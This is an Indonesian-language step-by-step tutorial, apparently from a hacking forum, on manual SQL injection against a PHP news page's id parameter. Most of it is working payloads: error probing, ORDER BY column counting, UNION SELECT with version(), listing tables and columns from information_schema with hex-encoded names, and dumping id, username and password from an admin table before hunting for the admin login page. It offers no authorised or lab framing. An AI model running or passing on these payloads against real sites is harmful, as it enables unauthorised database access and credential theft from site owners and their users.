Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:


Code:

[site]/berita.php?id=100' atau
[site]/berita.php?id=-100 sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:

Code:

[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
Code:

[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+Information_schema

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


===========
=step Empat:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
= step Lima: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :http://soai.forumotion.com/ascii-h1.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E


Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E--

============
=step Enam:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
= step Tujuh:=
==============

tahap terakhir mencari halam admin atau login